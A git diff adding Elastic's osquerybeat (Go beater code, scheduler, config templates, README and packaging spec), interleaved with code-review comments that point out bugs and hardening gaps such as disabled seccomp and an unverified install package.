+ - "windows-8" + windows-7: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-7" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/osquerybeat/Makefile b/x-pack/osquerybeat/Makefile new file mode 100644 index 00000000000..be4e2ceaeb3 --- /dev/null +++ b/x-pack/osquerybeat/Makefile @@ -0,0 +1,10 @@ +# +# Variables +# +GOX_FLAGS=-arch="amd64 386 arm ppc64 ppc64le" +ES_BEATS?=../../ + +# +# Includes +# +include $(ES_BEATS)/dev-tools/make/mage.mk diff --git a/x-pack/osquerybeat/NOTICE.txt b/x-pack/osquerybeat/NOTICE.txt new file mode 100644 index 00000000000..e9117eaa81e --- /dev/null +++ b/x-pack/osquerybeat/NOTICE.txt @@ -0,0 +1,5 @@ +osquerybeat +Copyright {year} Elastic + +This product includes software developed by The Apache Software +Foundation (http://www.apache.org/). diff --git a/x-pack/osquerybeat/README.md b/x-pack/osquerybeat/README.md new file mode 100644 index 00000000000..68c68a9aa96 --- /dev/null +++ b/x-pack/osquerybeat/README.md 
@@ -0,0 +1,116 @@ +# {Beat} + +Welcome to {Beat}. + +Ensure that this folder is at the following location: +`${GOPATH}/src/github.com/elastic/beats/v7/x-pack/osquerybeat` + +## Getting Started with {Beat} + +### Requirements + +* [Golang](https://golang.org/dl/) 1.7 + +### Init Project +To get running with {Beat} and also install the +dependencies, run the following command: + +``` +make update +``` + +It will create a clean git history for each major step. Note that you can always rewrite the history if you wish before pushing your changes. + +To push {Beat} in the git repository, run the following commands: + +``` +git remote set-url origin https://github.com/elastic/beats/v7/x-pack/osquerybeat +git push origin master +``` + +For further development, check out the [beat developer guide](https://www.elastic.co/guide/en/beats/libbeat/current/new-beat.html). + +### Build + +To build the binary for {Beat} run the command below. This will generate a binary +in the same directory with the name osquerybeat. + +``` +make +``` + + +### Run + +To run {Beat} with debugging output enabled, run: + +``` +./osquerybeat -c osquerybeat.yml -e -d "*" +``` + + +### Test + +To test {Beat}, run the following command: + +``` +make testsuite +``` + +alternatively: +``` +make unit-tests +make system-tests +make integration-tests +make coverage-report +``` + +The test coverage is reported in the folder `./build/coverage/` + +### Update + +Each beat has a template for the mapping in elasticsearch and a documentation for the fields +which is automatically generated based on `fields.yml` by running the following command. 
+ +``` +make update +``` + + +### Cleanup + +To clean {Beat} source code, run the following command: + +``` +make fmt +``` + +To clean up the build directory and generated artifacts, run: + +``` +make clean +``` + + +### Clone + +To clone {Beat} from the git repository, run the following commands: + +``` +mkdir -p ${GOPATH}/src/github.com/elastic/osquerybeat +git clone https://github.com/elastic/osquerybeat ${GOPATH}/src/github.com/elastic/osquerybeat +``` + + +For further development, check out the [beat developer guide](https://www.elastic.co/guide/en/beats/libbeat/current/new-beat.html). + + +## Packaging + +The beat frameworks provides tools to crosscompile and package your beat for different platforms. This requires [docker](https://www.docker.com/) and vendoring as described above. To build packages of your beat, run the following command: + +``` +make release +``` + +This will fetch and create all images required for the build process. The whole process to finish can take several minutes. diff --git a/x-pack/osquerybeat/_meta/config/beat.docker.yml.tmpl b/x-pack/osquerybeat/_meta/config/beat.docker.yml.tmpl new file mode 100644 index 00000000000..9b112291b46 --- /dev/null +++ b/x-pack/osquerybeat/_meta/config/beat.docker.yml.tmpl @@ -0,0 +1,18 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false 
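Review bot: In beat.docker.yml.tmpl, `seccomp.enabled: false` switches off system-call filtering for the whole osquerybeat process in order to let it fork/exec osqueryd, which removes a hardening layer from a process that runs queries it receives from the agent. If the beat's seccomp policy can be extended, allowing only the syscalls needed to start the child process would keep the filter for everything else. At minimum the comment should record the trade-off, for example `# NOTE: this disables the seccomp sandbox for the entire beat, not only for the osqueryd child`. The same block is repeated in beat.reference.yml.tmpl and beat.yml.tmpl.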
diff --git a/x-pack/osquerybeat/_meta/config/beat.reference.yml.tmpl b/x-pack/osquerybeat/_meta/config/beat.reference.yml.tmpl new file mode 100644 index 00000000000..9b112291b46 --- /dev/null +++ b/x-pack/osquerybeat/_meta/config/beat.reference.yml.tmpl @@ -0,0 +1,18 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false diff --git a/x-pack/osquerybeat/_meta/config/beat.yml.tmpl b/x-pack/osquerybeat/_meta/config/beat.yml.tmpl new file mode 100644 index 00000000000..9b112291b46 --- /dev/null +++ b/x-pack/osquerybeat/_meta/config/beat.yml.tmpl @@ -0,0 +1,18 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false 
diff --git a/x-pack/osquerybeat/_meta/fields.yml b/x-pack/osquerybeat/_meta/fields.yml new file mode 100644 index 00000000000..678896f0f4a --- /dev/null +++ b/x-pack/osquerybeat/_meta/fields.yml @@ -0,0 +1,4 @@ +- key: osquerybeat + title: Osquerybeat + description: + fields: \ No newline at end of file diff --git a/x-pack/osquerybeat/beater/install.go b/x-pack/osquerybeat/beater/install.go new file mode 100644 index 00000000000..cd9df6ba1c9 --- /dev/null +++ b/x-pack/osquerybeat/beater/install.go 
@@ -0,0 +1,74 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package beater
+
+import (
+ "context"
+ "os"
+ "runtime"
+
+ "github.com/elastic/beats/v7/libbeat/logp"
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro"
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fileutil"
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/install"
+)
+
+func installOsquery(ctx context.Context, dir string) error {
+ log := logp.NewLogger("osqueryd_install").With("dir", dir)
+ log.Info("Check if osqueryd needs to be installed")
+
+ fn := distro.OsquerydDistroFilename()
+ var installFunc func(context.Context, string, string, bool) error
+
+ if runtime.GOOS == "windows" {
+ installFunc = install.InstallFromMSI
+ } else if runtime.GOOS == "darwin" {
+ installFunc = install.InstallFromPkg
+ }
+
+ installing := false
+ ilog := log.With("file", fn)
+ if installFunc != nil {
+ exists, err := fileutil.FileExists(fn)
+ if err != nil {
+ ilog.Errorf("Failed to access the install package file, error: %v", err)
+ return err
+ }
+ if exists {
+ ilog.Info("Found install package file, installing")
+ err = installFunc(ctx, fn, dir, true)
+ if err != nil {
+ ilog.Errorf("Failed to extract from install package, error: %v", err)
+ return err
+ }
+ installing = true
+ } else {
+ ilog.Info("Install package doesn't exists, nothing to install")
+ }
+ }
+
+ if installing {
+ // Check that osqueryd file is now installed
+ osqfn := distro.OsquerydFilename()
+ flog := log.With("file", osqfn)
+ exists, err := fileutil.FileExists(osqfn)
+ if err != nil {
+ flog.Errorf("Failed to access the file, error: %v", err)
+ return err
+ }
+ if exists {
+ flog.Info("File found")
+ } else {
+ flog.Error("File is not found after install")
+ return os.ErrNotExist
+ }
+
+ if derr := os.Remove(fn); derr != nil {
+ ilog.Warn("Failed to delete install package after install")
+ }
+ log.Info("Successfully installed osqueryd")
+ }
+ return nil
+}
diff --git a/x-pack/osquerybeat/beater/osquerybeat.go b/x-pack/osquerybeat/beater/osquerybeat.go
new file mode 100644
index 00000000000..40398d16bc7
--- /dev/null
+++ b/x-pack/osquerybeat/beater/osquerybeat.go
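Review bot: `installOsquery` passes the package at `fn` to `install.InstallFromMSI` or `install.InstallFromPkg` as soon as `fileutil.FileExists(fn)` reports it, and no integrity check is visible in this file, so the beat installs whatever file sits under that name. Unless the install helpers verify the package themselves, compare it against a pinned digest before calling `installFunc`. `fn` and `osqfn` are used exactly as the `distro` helpers return them while the install target is `dir`; if those helpers return bare file names, both lookups resolve against the process working directory rather than the executable directory, and joining them with `dir` would make the intended location explicit (to be confirmed against `distro`). The cleanup warning drops the cause; `ilog.Warnf("Failed to delete install package after install, error: %v", derr)` would keep it.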
@@ -0,0 +1,381 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package beater
+
+import (
+ "context"
+ "errors"
+ "fmt"
+ "os"
+ "path/filepath"
+ "sync"
+ "time"
+
+ "github.com/gofrs/uuid"
+
+ "github.com/elastic/beats/v7/libbeat/beat"
+ "github.com/elastic/beats/v7/libbeat/common"
+ "github.com/elastic/beats/v7/libbeat/logp"
+
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/config"
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro"
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/osqueryd"
+)
+
+var (
+ ErrInvalidQueryConfig = errors.New("invalid query configuration")
+ ErrAlreadyRunning = errors.New("already running")
+ ErrQueryExecution = errors.New("failed query execution")
+ ErrActionRequest = errors.New("invalid action request")
+)
+
+// osquerybeat configuration.
+type osquerybeat struct {
+ b *beat.Beat
+ config config.Config
+ client beat.Client
+ osqCli *osqueryd.Client
+
+ log *logp.Logger
+
+ // Beat lifecycle context, cancelled on Stop
+ cancel context.CancelFunc
+ mx sync.Mutex
+}
+
+// New creates an instance of osquerybeat.
+func New(b *beat.Beat, cfg *common.Config) (beat.Beater, error) {
+ log := logp.NewLogger("osquerybeat")
+
+ c := config.DefaultConfig
+ if err := cfg.Unpack(&c); err != nil {
+ return nil, fmt.Errorf("Error reading config file: %v", err)
+ }
+
+ bt := &osquerybeat{
+ b: b,
+ config: c,
+ log: log,
+ }
+
+ return bt, nil
+}
+
+func (bt *osquerybeat) initContext() (context.Context, error) {
+ bt.mx.Lock()
+ defer bt.mx.Unlock()
+ if bt.cancel != nil {
+ return nil, ErrAlreadyRunning
+ }
+ var ctx context.Context
+ ctx, bt.cancel = context.WithCancel(context.Background())
+ return ctx, nil
+}
+
+func (bt *osquerybeat) close() {
+ bt.mx.Lock()
+ defer bt.mx.Unlock()
+ if bt.client != nil {
+ bt.client.Close()
+ bt.client = nil
+ }
+ if bt.cancel != nil {
+ bt.cancel()
+ bt.cancel = nil
+ }
+}
+
+func (bt *osquerybeat) inputTypes() []string {
+ m := make(map[string]struct{})
+ for _, input := range bt.config.Inputs {
+ m[input.Type] = struct{}{}
+ }
+
+ res := make([]string, 0, len(m))
+ for k := range m {
+ res = append(res, k)
+ }
+
+ return res
+}
+
+// Run starts osquerybeat.
+func (bt *osquerybeat) Run(b *beat.Beat) error {
+ ctx, err := bt.initContext()
+ if err != nil {
+ return err
+ }
+ defer bt.close()
+
+ var wg sync.WaitGroup
+
+ exefp, err := os.Executable()
+ if err != nil {
+ return err
+ }
+ exedir := filepath.Dir(exefp)
+
+ // Create temp directory for socket and possibly other things
+ // The unix domain socker path is limited to 108 chars and would
+ // not always be able to create in subdirectory
+ tmpdir, removeTmpDir, err := createSockDir(bt.log)
+ if err != nil {
+ return err
+ }
+ defer func() {
+ if removeTmpDir != nil {
+ removeTmpDir()
+ }
+ }()
+
+ // Install osqueryd if needed
+ err = installOsquery(ctx, exedir)
+ if err != nil {
+ return err
+ }
+
+ // Start osqueryd child process
+ osd := osqueryd.OsqueryD{
+ RootDir: exedir,
+ SocketPath: osqueryd.SocketPath(tmpdir),
+ }
+
+ // Connect publisher
+ bt.client, err = b.Publisher.Connect()
+ if err != nil {
+ return err
+ }
+
+ // Start osqueryd child process
+ osdCtx, osdCn := context.WithCancel(ctx)
+ defer osdCn()
+ osqDone, err := osd.Start(osdCtx)
+ if err != nil {
+ bt.log.Errorf("Failed to start osqueryd process: %v", err)
+ return err
+ }
+
+ // Connect to osqueryd socket. Replying on the client library retry logic that checks for the socket availability
+ bt.osqCli, err = osqueryd.NewClient(ctx, osd.SocketPath, osqueryd.DefaultTimeout)
+ if err != nil {
+ bt.log.Errorf("Failed to create osqueryd client: %v", err)
+ return err
+ }
+
+ // Unlink socket path early
+ if removeTmpDir != nil {
+ removeTmpDir()
+ removeTmpDir = nil
+ }
+
+ // Watch input configuration updates
+ inputConfigCh := config.WatchInputs(ctx)
+
+ // Start queries execution scheduler
+ scheduler := NewScheduler(ctx, bt.query)
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ scheduler.Run()
+ }()
+
+ // Load initial queries
+ streams, inputTypes := config.StreamsFromInputs(bt.config.Inputs)
+ sz := len(streams)
+ if sz > 0 {
+ scheduler.Load(streams)
+ }
+
+ // Agent actions handlers
+ var actionHandlers []*actionHandler
+ unregisterActionHandlers := func() {
+ // Unregister action handlers
+ if b.Manager != nil {
+ for _, ah := range actionHandlers {
+ b.Manager.UnregisterAction(ah)
+ ah.bt = nil
+ }
+ }
+ }
+
+ registerActionHandlers := func(itypes []string) {
+ unregisterActionHandlers()
+ // Register action handler
+ if b.Manager != nil {
+ for _, inType := range itypes {
+ ah := &actionHandler{
+ inputType: inType,
+ bt: bt,
+ }
+ b.Manager.RegisterAction(ah)
+ }
+ }
+ }
+
+ setManagerPayload := func(itypes []string) {
+ if b.Manager != nil {
+ b.Manager.SetPayload(map[string]interface{}{
+ "osquery_version": distro.OsquerydVersion(),
+ })
+ }
+ }
+
+LOOP:
+ for {
+ select {
+ case err = <-osqDone:
+ break LOOP // Exiting if osquery child process exited with error
+ case <-ctx.Done():
+ bt.log.Info("Wait osqueryd exit")
+ exitErr := <-osqDone
+ bt.log.Infof("Exited osqueryd process, error: %v", exitErr)
+ break LOOP
+ case inputConfigs := <-inputConfigCh:
+ streams, inputTypes = config.StreamsFromInputs(inputConfigs)
+ registerActionHandlers(inputTypes)
+ setManagerPayload(inputTypes)
+ scheduler.Load(streams)
+ }
+ }
+
+ // Unregister action handlers
+ unregisterActionHandlers()
+
+ // Wait for clean scheduler exit
+ wg.Wait()
+
+ return err
+}
+
+// Stop stops osquerybeat.
+func (bt *osquerybeat) Stop() {
+ bt.close()
+}
+
+func (bt *osquerybeat) query(ctx context.Context, q interface{}) error {
+ cfg, ok := q.(config.StreamConfig)
+ if !ok {
+ bt.log.Error("Unexpected query configuration")
+ return ErrInvalidQueryConfig
+ }
+
+ // Response ID could be useful in order to differentiate between different runs for the interval queries
+ responseID := uuid.Must(uuid.NewV4()).String()
+
+ log := bt.log.With("id", cfg.ID).With("query", cfg.Query).With("interval", cfg.Interval)
+
+ reqData := map[string]interface{}{
+ "id": cfg.ID,
+ "query": cfg.Query,
+ }
+
+ err := bt.executeQuery(ctx, log, cfg.Index, cfg.ID, cfg.Query, responseID, reqData)
+ if err != nil {
+ // Preserving the error as is, it will be attached to the result document
+ return err
+ }
+ return nil
+}
+
+func (bt *osquerybeat) executeQuery(ctx context.Context, log *logp.Logger, index, id, query, responseID string, req map[string]interface{}) error {
+ log.Debugf("Execute query: %s", query)
+
+ start := time.Now()
+
+ hits, err := bt.osqCli.Query(ctx, query)
+
+ if err != nil {
+ log.Errorf("Failed to execute query, err: %v", err)
+ return err
+ }
+
+ log.Infof("Completed query in: %v", time.Since(start))
+
+ for _, hit := range hits {
+ reqData := req["data"]
+ event := beat.Event{
+ Timestamp: time.Now(),
+ Fields: common.MapStr{
+ "type": bt.b.Info.Name,
+ "action_id": id,
+ "osquery": hit,
+ },
+ }
+ if reqData != nil {
+ event.Fields["action_data"] = reqData
+ }
+ if responseID != "" {
+ event.Fields["response_id"] = responseID
+ }
+ if index != "" {
+ event.Meta = common.MapStr{"index": index}
+ }
+
+ bt.client.Publish(event)
+ }
+ log.Infof("The %d events sent to index %s", len(hits), index)
+ return nil
+}
+
+type actionHandler struct {
+ inputType string
+ bt *osquerybeat
+}
+
+func (a *actionHandler) Name() string {
+ return a.inputType
+}
+
+type actionData struct {
+ Query string
+ ID string
+}
+
+func actionDataFromRequest(req map[string]interface{}) (ad actionData, err error) {
+ if req == nil {
+ return ad, ErrActionRequest
+ }
+ if v, ok := req["id"]; ok {
+ if id, ok := v.(string); ok {
+ ad.ID = id
+ }
+ }
+ if v, ok := req["data"]; ok {
+ if m, ok := v.(map[string]interface{}); ok {
+ if v, ok := m["query"]; ok {
+ if query, ok := v.(string); ok {
+ ad.Query = query
+ }
+ }
+ }
+ }
+ return ad, nil
+}
+
+// Execute handles the action request.
+func (a *actionHandler) Execute(ctx context.Context, req map[string]interface{}) (map[string]interface{}, error) {
+
+ start := time.Now().UTC()
+ err := a.execute(ctx, req)
+ end := time.Now().UTC()
+
+ res := map[string]interface{}{
+ "started_at": start.Format(time.RFC3339Nano),
+ "completed_at": end.Format(time.RFC3339Nano),
+ }
+
+ if err != nil {
+ res["error"] = err.Error()
+ }
+ return res, nil
+}
+
+func (a *actionHandler) execute(ctx context.Context, req map[string]interface{}) error {
+ ad, err := actionDataFromRequest(req)
+ if err != nil {
+ return fmt.Errorf("%v: %w", err, ErrQueryExecution)
+ }
+ return a.bt.executeQuery(ctx, a.bt.log, config.DefaultStreamIndex, ad.ID, ad.Query, "", req)
+}
diff --git a/x-pack/osquerybeat/beater/runner.go b/x-pack/osquerybeat/beater/runner.go
new file mode 100644
index 00000000000..c56f5caa9aa
--- /dev/null
+++ b/x-pack/osquerybeat/beater/runner.go
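Review bot: In `Run` (osquerybeat.go), `registerActionHandlers` builds each `actionHandler` and passes it to `b.Manager.RegisterAction(ah)` but never stores it in `actionHandlers`, so `unregisterActionHandlers` always ranges over an empty slice and no handler is unregistered, neither on a config update nor when Run returns. A handler left registered keeps its `bt` pointer, and an action delivered after `close()` has set `bt.client = nil` would reach `bt.client.Publish(event)` in `executeQuery` and panic. Adding `actionHandlers = append(actionHandlers, ah)` after the `RegisterAction` call and `actionHandlers = nil` at the end of `unregisterActionHandlers` closes that gap. Handlers are also registered only in the `inputConfigCh` case, so the initial `bt.config.Inputs` get none. Separately, `actionDataFromRequest` returns a nil error when `id` or `data.query` is absent or not a string, so an empty query is sent to osqueryd; returning `ErrActionRequest` when `ad.Query == ""` would reject malformed action requests early.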
@@ -0,0 +1,57 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package beater
+
+import (
+ "context"
+ "sync"
+ "time"
+)
+
+type runner struct {
+ cancel context.CancelFunc
+ wg sync.WaitGroup
+}
+
+func (r *runner) stop() {
+ r.cancel()
+ r.wg.Wait()
+}
+
+func startRunner(pctx context.Context, q interface{}, interval time.Duration, query func(context.Context, interface{}) error) *runner {
+ ctx, cancel := context.WithCancel(pctx)
+ r := &runner{
+ cancel: cancel,
+ }
+
+ r.wg.Add(1)
+ go func() {
+ defer cancel()
+ defer r.wg.Done()
+
+ // Run query right away
+ query(ctx, q)
+
+ if interval == 0 {
+ return
+ }
+
+ // Schedule with interval
+ t := time.NewTimer(interval)
+ defer t.Stop()
+
+ for {
+ select {
+ case <-t.C:
+ query(ctx, q)
+ t.Reset(interval)
+ case <-ctx.Done():
+ return
+ }
+ }
+ }()
+
+ return r
+}
diff --git a/x-pack/osquerybeat/beater/scheduler.go b/x-pack/osquerybeat/beater/scheduler.go
new file mode 100644
index 00000000000..335555470aa
--- /dev/null
+++ b/x-pack/osquerybeat/beater/scheduler.go
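Review bot: Both `query(ctx, q)` calls inside the goroutine of `startRunner` discard the returned error, so a scheduled query that keeps failing leaves no trace at this layer and nothing signals that collection for that stream has stopped producing results. The callback is declared as `func(context.Context, interface{}) error`, so the value is available; I would capture it at both call sites, e.g. `if err := query(ctx, q); err != nil && ctx.Err() == nil { /* log or count the failure */ }`. The runner has no logger in this file, so passing one in (or an error callback) would be part of that change. If dropping the error is intended because the callback reports it itself, say so in a doc comment on `startRunner`.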
@@ -0,0 +1,119 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package beater
+
+import (
+ "context"
+
+ "github.com/elastic/beats/v7/libbeat/logp"
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/config"
+)
+
+type QueryFunc func(context.Context, interface{}) error
+
+// Scheduler executes queries either periodically or once depending on the query configuration
+type Scheduler struct {
+ ctx context.Context
+ inCh chan []config.StreamConfig
+ runners map[string]*runner
+ queryFunc QueryFunc
+ log *logp.Logger
+}
+
+func NewScheduler(ctx context.Context, queryFunc QueryFunc) *Scheduler {
+ return &Scheduler{
+ ctx: ctx,
+ inCh: make(chan []config.StreamConfig, 1),
+ runners: make(map[string]*runner),
+ queryFunc: queryFunc,
+ log: logp.NewLogger("scheduler"),
+ }
+}
+
+func (s *Scheduler) Load(streams []config.StreamConfig) {
+ select {
+ case s.inCh <- streams:
+ case <-s.ctx.Done():
+ }
+}
+
+func (s *Scheduler) Run() {
+LOOP:
+ for {
+ select {
+ case streams := <-s.inCh:
+ s.load(streams)
+ case <-s.ctx.Done():
+ s.stopRunners()
+ s.log.Info("Exiting on context cancel")
+ break LOOP
+ }
+ }
+}
+
+func (s *Scheduler) isCancelled() bool {
+ return s.ctx.Err() != nil
+}
+
+func (s *Scheduler) stopRunners() {
+ s.load(nil)
+}
+
+func (s *Scheduler) load(streams []config.StreamConfig) {
+ var (
+ once, repeating []config.StreamConfig
+ )
+
+ // Separate fire-once queries and repeating queries
+ for _, stream := range streams {
+ if stream.Interval == 0 {
+ once = append(once, stream)
+ } else {
+ repeating = append(repeating, stream)
+ }
+ }
+
+ // Cancel and remove the query runners that are not in the streams
+ var ids []string
+ for id, r := range s.runners {
+ found := false
+ for _, s := range repeating {
+ if id == s.ID {
+ found = true
+ break
+ }
+ }
+ if
!found {
+ r.stop()
+ ids = append(ids, id)
+ }
+ }
+
+ for _, id := range ids {
+ delete(s.runners, id)
+ }
+
+ if s.isCancelled() {
+ return
+ }
+
+ // Run queries that should be executed only one
+ for _, q := range once {
+ if s.isCancelled() {
+ return
+ }
+ startRunner(s.ctx, q, q.Interval, s.queryFunc)
+ }
+
+ // Schedule interval queries
+ for _, q := range repeating {
+ if s.isCancelled() {
+ return
+ }
+ if _, ok := s.runners[q.ID]; !ok {
+ s.runners[q.ID] = startRunner(s.ctx, q, q.Interval, s.queryFunc)
+ }
+ }
+}
diff --git a/x-pack/osquerybeat/beater/sockdir_unix.go b/x-pack/osquerybeat/beater/sockdir_unix.go
new file mode 100644
index 00000000000..eb8d1808b7b
--- /dev/null
+++ b/x-pack/osquerybeat/beater/sockdir_unix.go
@@ -0,0 +1,36 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+// +build !windows
+
+package beater
+
+import (
+ "io/ioutil"
+ "os"
+ "syscall"
+
+ "github.com/elastic/beats/v7/libbeat/logp"
+)
+
+func createSockDir(log *logp.Logger) (string, func(), error) {
+ // Try to create socket in /var/run first
+ // This would result in something the directory something like: /var/run/027202467
+ tpath, err := ioutil.TempDir("/var/run", "")
+ if err != nil {
+ if perr, ok := err.(*os.PathError); ok {
+ if perr.Err == syscall.EACCES {
+ log.Warnf("Failed to access the directory %s, running as non-root?", perr.Path)
+ tpath, err = ioutil.TempDir("", "")
+ if err != nil {
+ return "", nil, err
+ }
+ }
+ }
+ }
+
+ return tpath, func() {
+ os.RemoveAll(tpath)
+ }, nil
+}
diff --git a/x-pack/osquerybeat/beater/sockdir_windows.go b/x-pack/osquerybeat/beater/sockdir_windows.go
new file mode 100644
index 00000000000..91115774241
--- /dev/null
+++ b/x-pack/osquerybeat/beater/sockdir_windows.go
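Review bot: In `load`, a repeating stream is started only when `s.runners` has no entry for its ID (`if _, ok := s.runners[q.ID]; !ok`), and the stop loop before it keeps every runner whose ID is still present, so a reload that changes `Query` or `Interval` under an existing ID leaves the old query running. If stream configs are meant to be updatable in place, the updated query never takes effect until the process restarts. Keeping the config a runner was started with next to it and restarting on a difference fixes this, as sketched below; whether a changed `Index` should also restart the runner is a call for the author. Separately, the inner `for _, s := range repeating` shadows the receiver `s`, and runners started for fire-once streams are not stored anywhere, so `stopRunners` does not wait for them.

```go
// scheduled pairs a runner with the stream config it was started with.
type scheduled struct {
	r   *runner
	cfg config.StreamConfig
}

// … unchanged: Scheduler and NewScheduler, except runners becomes map[string]scheduled …
// … unchanged: split of streams into once and repeating …

	// Stop runners whose stream is gone or whose query or interval changed
	for id, cur := range s.runners {
		keep := false
		for _, next := range repeating {
			if id == next.ID {
				keep = cur.cfg.Query == next.Query && cur.cfg.Interval == next.Interval
				break
			}
		}
		if !keep {
			cur.r.stop()
			delete(s.runners, id)
		}
	}

// … unchanged: cancellation check and fire-once loop …

		if _, ok := s.runners[q.ID]; !ok {
			s.runners[q.ID] = scheduled{r: startRunner(s.ctx, q, q.Interval, s.queryFunc), cfg: q}
		}
```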
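Review bot: `createSockDir` returns an empty path with a nil error whenever the first `ioutil.TempDir("/var/run", "")` fails with anything other than a `*os.PathError` carrying `EACCES` (for example when `/var/run` does not exist), because the outer `if err != nil` block falls through to the final `return tpath, ..., nil`. The caller is outside this hunk, but a socket path built from an empty directory would presumably resolve relative to the working directory instead of inside a private temporary directory. Returning early for every other error closes the gap: `perr, ok := err.(*os.PathError)` followed by `if !ok || perr.Err != syscall.EACCES { return "", nil, err }`, placed before the warning and the fallback. The comment `This would result in something the directory something like` also needs rewording, e.g. `// This results in a directory such as /var/run/027202467`.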
@@ -0,0 +1,15 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+// +build windows
+
+package beater
+
+import "github.com/elastic/beats/v7/libbeat/logp"
+
+func createSockDir(log *logp.Logger) (string, func(), error) {
+ // Noop on winders
+ return "", func() {
+ }, nil
+}
diff --git a/x-pack/osquerybeat/cmd/root.go b/x-pack/osquerybeat/cmd/root.go
new file mode 100644
index 00000000000..adaa112619f
--- /dev/null
+++ b/x-pack/osquerybeat/cmd/root.go
@@ -0,0 +1,29 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package cmd
+
+import (
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/beater"
+
+ cmd "github.com/elastic/beats/v7/libbeat/cmd"
+ "github.com/elastic/beats/v7/libbeat/cmd/instance"
+ xpackcmd "github.com/elastic/beats/v7/x-pack/libbeat/cmd"
+)
+
+// Name of this beat
+var Name = "osquerybeat"
+
+var RootCmd = Osquerybeat()
+
+func Osquerybeat() *cmd.BeatsRootCmd {
+ settings := instance.Settings{
+ Name: Name,
+ ElasticLicensed: true,
+ }
+ command := cmd.GenRootCmdWithSettings(beater.New, settings)
+
+ xpackcmd.AddXPack(command, Name)
+ return command
+}
diff --git a/x-pack/osquerybeat/dev-tools/packaging/packages.yml b/x-pack/osquerybeat/dev-tools/packaging/packages.yml
new file mode 100644
index 00000000000..710465e9e12
--- /dev/null
+++ b/x-pack/osquerybeat/dev-tools/packaging/packages.yml
@@ -0,0 +1,89 @@ +--- + +# This file contains the package specifications for Osquerybeat. + +shared: + - &common + name: '{{.BeatName}}' + service_name: '{{.BeatServiceName}}' + os: '{{.GOOS}}' + arch: '{{.PackageArch}}' + vendor: '{{.BeatVendor}}' + version: '{{ beat_version }}' + license: '{{.BeatLicense}}' + url: '{{.BeatURL}}' + description: '{{.BeatDescription}}' + + - &binary_files + '{{.BeatName}}{{.BinaryExt}}': + source: build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + mode: 0755 + fields.yml: + source: fields.yml + mode: 0644 + LICENSE.txt: + source: '{{ repo.RootDir }}/LICENSE.txt' + mode: 0644 + NOTICE.txt: + source: '{{ repo.RootDir }}/NOTICE.txt' + mode: 0644 + README.md: + template: '{{ elastic_beats_dir }}/dev-tools/packaging/templates/common/README.md.tmpl' + mode: 0644 + .build_hash.txt: + content: > + {{ commit }} + mode: 0644 + '{{.BeatName}}.reference.yml': + source: '{{.BeatName}}.reference.yml' + mode: 0644 + '{{.BeatName}}.yml': + source: '{{.BeatName}}.yml' + mode: 0600 + config: true + + # Binary package spec (tar.gz for linux/darwin) + - &binary_spec + <<: *common + files: + <<: *binary_files + + # + # License modifiers for the Elastic License + # + - &elastic_license_for_binaries + license: "Elastic License" + files: + LICENSE.txt: + source: '{{ repo.RootDir }}/licenses/ELASTIC-LICENSE.txt' + mode: 0644 + +# specs is a list of named packaging "flavors". 
